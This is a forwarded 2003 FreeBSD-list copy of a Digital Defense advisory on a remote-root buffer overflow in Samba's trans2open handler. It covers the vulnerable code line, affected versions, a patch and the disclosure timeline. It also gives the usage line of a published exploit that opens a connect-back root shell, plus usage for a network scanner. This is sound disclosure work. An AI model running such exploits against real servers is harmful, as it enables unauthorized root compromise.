freebsd security - Apr 2003 - Fwd: [VulnWatch] [DDI-1013] Buffer Overflow in Samba allows remote root compromise

FYI

>Mailing-List: contact vulnwatch-help@vulnwatch.org; run by ezmlm
>List-Post: <mailto:vulnwatch@vulnwatch.org>
>List-Help: <mailto:vulnwatch-help@vulnwatch.org>
>List-Unsubscribe: <mailto:vulnwatch-unsubscribe@vulnwatch.org>
>List-Subscribe: <mailto:vulnwatch-subscribe@vulnwatch.org>
>Delivered-To: mailing list vulnwatch@vulnwatch.org
>Delivered-To: moderator for vulnwatch@vulnwatch.org
>Date: Mon, 7 Apr 2003 07:44:58 +0000 (UTC)
>From: Erik Parker <erik.parker@digitaldefense.net>
>X-X-Sender: Erik Parker <erik.parker@digitaldefense.net>
>To: vulnwatch@vulnwatch.org
>Subject: [VulnWatch] [DDI-1013] Buffer Overflow in Samba allows remote 
>root compromise
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
>|------------------------------------------------------------------------------|
>  Digital Defense Inc. Security Advisory 
> DDI-1013        labs@digitaldefense.net
>  http://www.digitaldefense.net/
>|------------------------------------------------------------------------------|
>
>Synopsis          : Buffer Overflow in Samba allows remote root compromise
>Package           : Samba, Samba-TNG
>Type              : Remote Root Compromise
>Issue date        : 04-07-2003
>Versions Affected : < Samba 2.2.8a, <= Samba 2.0.10,  < Samba-TNG
0.3.2
>Not Affected      : Samba 3.0 Alpha Versions, CVS Versions of Samba-TNG
>CVE Id            : CAN-2003-0201
>
>|------------------------------------------------------------------------------|
>
>
>o Product description:
>    Samba is an Open Source/Free Software suite that provides seamless 
> file and
>    print services to SMB/CIFS clients. Samba-TNG was originally a fork off
of
>    the Samba source tree, and aims at being a substitute for a Windows NT 
> domain
>    controller.
>
>
>o Problem description:
>    An anonymous user can gain remote root access due to a buffer overflow 
> caused
>    by a StrnCpy() into a char array (fname) using a non-constant length
>    (namelen).
>
>    StrnCpy(fname,pname,namelen);    /* Line 252 of smbd/trans2.c */
>
>    In the call_trans2open function in trans2.c, the Samba StrnCpy function
>    copies pname into fname using namelen. The variable namelen is 
> assigned the
>    value of strlen(pname)+1, which causes the overflow.
>
>    The variable 'fname' is a _typedef_ pstring, which is a char
with a
> size of
>    1024. If pname is greater than 1024, you can overwrite almost anything
you
>    want past the 1024th byte that fits inside of sizeof(pname), or the
value
>    returned by SVAL(inbuf,smbd_tpscnt) in function reply_trans2(), which 
> should
>    be around 2000 bytes.
>
>    The Common Vulnerabilities and Exposures (CVE) project has assigned 
> the name
>    CAN-2003-0201 to this issue. This is a candidate for inclusion in the
CVE
>    list (http://cve.mitre.org), which standardizes names for security 
> problems.
>
>
>o Testing Environment:
>    Tested against source compiles and binary packages of Samba from version
>    2.2.5 to 2.2.8 on the following x86 platforms:
>
>    Redhat Linux 7.1, 7.3, 8.0
>    Gentoo Linux 1.4-rc3
>    SuSe Linux 7.3
>    FreeBSD 4.6, 4.8, 5.0
>    Solaris 9
>
>
>o Solutions and Workarounds:
>    Upgrading to the latest version of Samba or Samba-TNG is the recommended
>    solution to this vulnerability. Samba version 2.2.8a, and Samba-TNG 
> version
>    0.3.2 are not vulnerable. There will be no new releases for the 2.0 
> line of
>    Samba code. The only fix for Samba 2.0 is to apply the patches that 
> Samba is
>    providing.
>
>    A workaround in the current source code for this specific vulnerability
>    would be to modify the StrnCpy line found at line 250 in smbd/trans2.c 
> in the
>    Samba 2.2.8 source code:
>
>    -StrnCpy(fname,pname,namelen);
>    +StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));
>
>    As a result of this vulnerability being identified at least three others
>    have also been found by the Samba team after reviewing similar usages 
> in the
>    source tree. One is a static overflow and the other two are heap 
> overflows.
>    Applying the fix above will only protect against the specific problem
>    identified in this advisory. To fully protect yourself, you must apply
the
>    patches from Samba, or upgrade to 2.2.8a.
>
>    Samba is available for download from: http://www.samba.org/
>    Samba-TNG is available for download from: http://www.samba-tng.org/
>
>
>o Exploit:
>    An exploit named trans2root.pl has been posted on the Digital Defense, 
> Inc.
>    website. A quick udp based based scanner named nmbping.pl has also been
>    posted to assist you in identifying Samba servers on your network. 
> Both are
>    available for download from the following URL:
>
>    http://www.digitaldefense.net/labs/securitytools.html
>
>    This exploit works against all distributions listed in the testing
>    environment section. Usage is as follows:
>
>    trans2root.pl <options> -t <target type> -H <your ip>
-h <target ip>
>
>    This exploit should work against all x86 Linux, Solaris, and  FreeBSD 
> hosts
>    running the 2.2.x branch of Samba. Hosts with a non-executable stack 
> are not
>    vulnerable to this particular exploit. The exploit will cause the 
> target host
>    to connect back to the host running the exploit and spawn a root shell 
> on the
>    defined port (default is 1981).
>
>    The scanner is very easy to use, and should detect and identify Samba
and
>    Windows SMB services. Usage is as follows:
>
>    nmbping.pl <network/cidr>
>
>
>o Forced Release:
>    This vulnerability is being actively exploited in the wild. Digital 
> Defense,
>    Inc. discovered this bug by analyzing a packet capture of an attack 
> against a
>    host running Samba 2.2.8. The attack captured was performed on April
1st,
>    2003. Samba users are urged to check their Samba servers for signs of
>    compromise. Samba and Digital Defense, Inc. decided to release their
>    advisories before all vendors had a chance to update their packages due
to
>    this vulnerability being actively exploited.
>
>
>o Revision History:
>    04-07-2003     Initial public release
>
>    Latest revision available at:
>    http://www.digitaldefense.net/labs/advisories.html
>
>
>o Vendor Contact Information:
>    04-03-2003     security@samba.org notified
>    04-03-2003     elrond@samba-tng.org notified.
>    04-03-2003     Samba Team responds via telephone, acknowledges 
> vulnerability
>    04-03-2003     Elrond of Samba-TNG responds and acknowledges
vulnerability
>    04-04-2003     Samba Team notifies vendorsec mailing list
>    04-07-2003     Initial public release
>
>o Thanks to:
>    Elrond of Samba-TNG, The Samba Security Team, and everyone on the
>    Digital Defense Inc., SECOPS team.
>
>-----BEGIN PGP SIGNATURE-----
>
>iD8DBQE+kT/5jB+XO4ZKjSARAsJpAJsH05MqOIqauWrK1kKOAkwmCsXorgCeK92r
>eDEmOgRY4z7Y0b7HecHyf+A>=Af+n
>-----END PGP SIGNATURE-----
--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Sentex Communications,     			  mike@sentex.net
Providing Internet since 1994                    www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike